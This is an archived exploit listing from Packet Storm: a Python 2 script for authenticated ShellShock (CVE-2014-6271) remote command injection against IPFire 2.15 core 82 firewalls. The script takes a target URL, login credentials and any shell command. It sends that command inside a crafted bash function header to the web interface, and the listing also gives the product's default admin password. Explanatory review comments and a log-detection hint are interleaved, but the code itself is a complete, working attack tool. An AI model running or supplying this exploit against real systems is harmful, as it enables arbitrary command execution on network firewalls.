packetstorm | Claudio Viviani | PACKETSTORM:128482
HistorySep 30, 2014 - 12:00 a.m.

IPFire 2.15 Bash Command Injection

2014-09-30 00:00:00
Claudio Viviani
packetstormsecurity.com
176

EPSS

0.974

Percentile

99.9%

`#!/usr/bin/env python  
#  
# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)  
#  
# Exploit Author : Claudio Viviani  
#  
# Vendor Homepage : http://www.ipfire.org  
#  
# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso  
#  
# Date : 2014-09-29  
#  
# Fixed version: IPFire 2.15 core 83 (2014-09-28)  
#  
# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.  
# It can be maintained via a web interface.  
# The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.  
# IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.  
#  
# Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection  
# (CVE-2014-6271)  
#  
# Suggestion:  
#  
# If you can't update the distro and you installed IPFire from image files (ARM, Flash),  
# make sure to change the default login credentials of the web user interface (user:admin pass:ipfire)  
#  
#  
# http connection  
import urllib2  
# Basic Auth management Base64  
import base64  
# Args management  
import optparse  
# Error management  
import sys  
  
# Start-up banner: ASCII-art title followed by the author's name and contact
# links. The script prints it on every run, including before the usage help.
# NOTE(review): the two "[email protected]" entries look like e-mail addresses
# masked by the hosting page; they are left exactly as found.
banner = """  
___ _______ _______ __ _______ __  
| | _ | _ |__.----.-----. | _ .-----|__|  
|. |. 1 |. 1___| | _| -__| |. 1___| _ | |  
|. |. ____|. __) |__|__| |_____| |. |___|___ |__|  
|: |: | |: | |: 1 |_____|  
|::.|::.| |::.| |::.. . |  
`---`---' `---' `-------'  
_______ __ __ __ _______ __ __  
| _ | |--.-----| | | _ | |--.-----.----| |--.  
| 1___| | -__| | | 1___| | _ | __| <  
|____ |__|__|_____|__|__|____ |__|__|_____|____|__|__|  
|: 1 | |: 1 |  
|::.. . | |::.. . |  
`-------' `-------'  
  
IPFire <= 2.15 c0re 82 Authenticated  
Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n  
  
Written by:  
  
Claudio Viviani  
  
http://www.homelab.it  
  
[email protected]  
[email protected]  
  
https://www.facebook.com/homelabit  
https://twitter.com/homelabit  
https://plus.google.com/+HomelabIt1/  
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww  
"""  
  
# Check url  
def checkurl(url):
    """Return *url* unchanged when it begins with http:// or https://.

    Any other prefix prints an error message and ends the process with exit
    status 1. The comparison is case-sensitive and only the scheme prefix is
    inspected; the host, port and path are not validated.
    """
    has_scheme = url[:7] == "http://" or url[:8] == "https://"
    if has_scheme:
        return url
    # No recognised scheme: report it and stop the script.
    print('[X] You must insert http:// or https:// procotol')
    sys.exit(1)
  
def connectionScan(url,user,pwd,cmd):
    """Probe *url* and report whether a header-borne bash function is evaluated.

    The function first requests *url* without credentials and only continues
    when the server answers 401. It then repeats the request with HTTP Basic
    credentials (*user*, *pwd*) and one extra request header named ``VULN``.
    The verdict printed at the end depends on whether a fixed marker string
    shows up in the response body. Nothing is returned; all results are
    printed. This is Python 2 code (``print`` statements, ``urllib2``,
    ``except X, e``).

    NOTE(review): the nesting below was reconstructed from a listing whose
    indentation had been flattened -- confirm against the original file.
    NOTE(review): for defenders, the recognisable trace of this check is a
    request header whose value starts with ``() {``; such a value in any
    header is worth alerting on in web-server, proxy or IDS logs. The file
    header names IPFire 2.15 core 83 as the fixed version.
    """
    print '[+] Connection in progress...'
    try:
        # First request carries no credentials. A successful (non-error)
        # answer means the page is not behind Basic auth, which the script
        # treats as "not an IPFire admin page".
        response = urllib2.Request(url)
        content = urllib2.urlopen(response)
        print '[X] IPFire Basic Authentication not found'
    except urllib2.HTTPError, e:
        if e.code == 404:
            print '[X] Page not found'
        elif e.code == 401:
            # 401 is the expected answer: the page asks for credentials.
            try:
                print '[+] Authentication in progress...'
                # encodestring() appends (and may insert) newlines, which
                # are not valid inside a header value, hence the replace().
                base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
                # The header value is a bash function definition followed by
                # two commands: an echo of a fixed marker, then the
                # caller-supplied command. The commands only run where bash
                # still evaluates text trailing a function definition
                # imported from the environment (CVE-2014-6271, per the file
                # header).
                headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' }
                response = urllib2.Request(url, None, headers)
                response.add_header("Authorization", "Basic %s" % base64string)
                content = urllib2.urlopen(response).read()
                # The substring "ipfire" in the body is taken as proof that
                # the login worked and the page belongs to IPFire.
                if "ipfire" in content:
                    print '[+] Username & Password: OK'
                    print '[+] Checking for vulnerability...'
                    # The verdict rests on the echo marker alone; whether the
                    # supplied command succeeded is never checked.
                    # NOTE(review): a page that reflects request headers
                    # would also contain the marker and read as a false
                    # positive.
                    if 'H0m3l4b1t' in content:
                        print '[!] Command "'+cmd+'": INJECTED!'
                    else:
                        print '[X] Not Vulnerable :('
                else:
                    print '[X] No IPFire page found'
            except urllib2.HTTPError, e:
                # A second 401 means the supplied credentials were rejected.
                if e.code == 401:
                    print '[X] Wrong username or password'
                else:
                    print '[X] HTTP Error: '+str(e.code)
            except urllib2.URLError:
                print '[X] Connection Error'
        else:
            # Any other HTTP status on the first request is reported as-is.
            print '[X] HTTP Error: '+str(e.code)
    except urllib2.URLError:
        # Raised for the first request when the connection itself fails.
        print '[X] Connection Error'
  
# Command-line interface: four string options, each stored as given.
commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"')
for short_flag, long_flag, help_text in (
    ('-t', '--target', "Insert TARGET URL"),
    ('-c', '--cmd', "Insert command name"),
    ('-u', '--user', "Insert username"),
    ('-p', '--pwd', "Insert password"),
):
    commandList.add_option(short_flag, long_flag, action="store", help=help_text)
options, remainder = commandList.parse_args()

# The banner is shown on every run; when any of the four options is missing
# or empty, the usage help follows and the script exits with status 1.
print(banner)
if not all((options.target, options.cmd, options.user, options.pwd)):
    commandList.print_help()
    sys.exit(1)

# checkurl() exits the script itself when the target lacks an http(s) scheme.
url, cmd, user, pwd = checkurl(options.target), options.cmd, options.user, options.pwd

connectionScan(url, user, pwd, cmd)
`